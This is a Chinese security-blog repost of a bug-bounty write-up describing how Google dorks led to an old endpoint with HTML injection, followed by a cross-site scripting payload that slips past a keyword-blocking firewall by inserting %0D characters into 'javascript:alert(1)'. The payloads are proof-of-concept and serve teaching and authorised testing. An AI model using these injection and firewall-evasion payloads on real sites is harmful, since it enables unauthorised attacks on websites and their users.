谷歌语法发现XSS+Waf Bypass

admin 2024年11月11日16:46:05评论8 views字数 710阅读2分22秒阅读模式
 

正文部分

原作者:https://medium.com/@Thigh_GoD

信息收集

使用 Google 语法进行信息收集

这里推荐一个网站,他设置好了一些常见的语法,可以让你更快的发现比较敏感的资产

https://taksec.github.io/google-dorks-bug-bounty/

谷歌语法发现XSS+Waf Bypass

输入想要寻找的域名,点击就会自动填充Google语法

谷歌语法发现XSS+Waf Bypass
谷歌语法发现XSS+Waf Bypass

XSS注入

通过这个方式发现了目标资产的一个历史路径example.php

通过 Ctrl + U 发现了meta标签,并且没有过滤掉"/>,而且其可以通过参数t传参设置

?t=somethingsomethingsomething&p=”/><a href=testing>THIS IS AN INJECTED HTML LINK</a>”&s=something
源代码:
谷歌语法发现XSS+Waf Bypass

网站正常解析:

谷歌语法发现XSS+Waf Bypass

尝试使用常见的poc <script>alert(1)</script>``<img src=x onerror=alert(1)>``JavaScript,发现存在waf

使用换行bypass waf

谷歌语法发现XSS+Waf Bypass

通过拦截的关键词,发现这个 WAF 是将 javascript 和 alert 等关键字列入黑名单。

这时候就可以使用 %0D换行符来进行混淆,

在HTML中其可以正常解析,

<a href="javascript:alert(1)">

但是在waf中他可能就无法正常识别

<a href="ja%0Dva%0Dscr%0Dipt:aler%0Dt(1)">

<a href="ja
va
scr
ipt:aler
t(1)">

成功触发xss

谷歌语法发现XSS+Waf Bypass

 

原文始发于微信公众号(fkalis):【海外SRC漏洞挖掘】谷歌语法发现XSS+Waf Bypass

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日16:46:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   谷歌语法发现XSS+Waf Bypasshttps://cn-sec.com/archives/3383771.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息